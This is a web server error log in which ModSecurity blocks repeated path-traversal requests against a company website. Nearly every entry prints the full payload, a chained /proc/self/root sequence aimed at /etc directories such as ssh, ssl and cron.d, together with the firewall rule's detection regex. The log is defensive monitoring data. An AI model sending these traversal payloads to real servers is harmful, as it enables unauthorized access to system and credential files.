[Tue Mar 17 14:24:16.871257 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.243.128:56104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOQK4xEDsg_V3ESNZNjQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:17.337610 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.31:44008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOQQeiSKl8TjouI-Ya1gAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:19.252132 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.243.128:56118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOQnIk7brgkOH-rIWM6wAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:19.254357 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.241.31:41504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOQ6t8Nd0UC_OcbVHMHAAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:20.659341 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.243.128:55124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmORL-sgTmmJoPuMdy3eAAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:21.416607 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:41506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmORa4xEDsg_V3ESNZNjgAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:22.159227 2026] [:error] [pid 9299:tid 140411565680384] [client 74.7.243.128:55134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmORr-sgTmmJoPuMdy3eQAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:22.907976 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.241.31:41520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmORq4xEDsg_V3ESNZNkQAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:39.129817 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57770] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:24:40.513467 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.243.128:42014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOWAeiSKl8TjouI-Ya3QAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:41.257225 2026] [:error] [pid 6296:tid 140411632822016] [client 74.7.241.31:35066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOWXIk7brgkOH-rIWM9QAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:42.003609 2026] [:error] [pid 7004:tid 140411666392832] [client 74.7.243.128:42030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOWsU6Sx0TG1YjmQiv_wAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:42.171540 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:35066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOWnIk7brgkOH-rIWM9wAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:43.496137 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.128:42032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOWweiSKl8TjouI-Ya4AAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:24:44.371748 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:35074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOXAeiSKl8TjouI-Ya4gAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:57.455270 2026] [:error] [pid 29151:tid 140411607643904] [client 74.7.241.31:43724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOafPqhzTj3BvfDX-JNQAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:58.899906 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:43726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOanIk7brgkOH-rIWNAwAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:24:59.379073 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.128:42036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOa6BJNF7axNlVR0UYlwAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:00.323289 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:43740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmObBj0p0SRWAqcjGF6zwAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:01.143115 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:25:01.983682 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.241.31:43748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmObat8Nd0UC_OcbVHMKQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:25:03.239667 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.243.128:51816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOb6t8Nd0UC_OcbVHMKwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:03.697064 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.243.128:51816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOb6t8Nd0UC_OcbVHMLAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:25:04.454933 2026] [:error] [pid 28879:tid 140411632822016] [client 74.7.241.31:43756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOcFDN3UhJjLukrK-MYgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
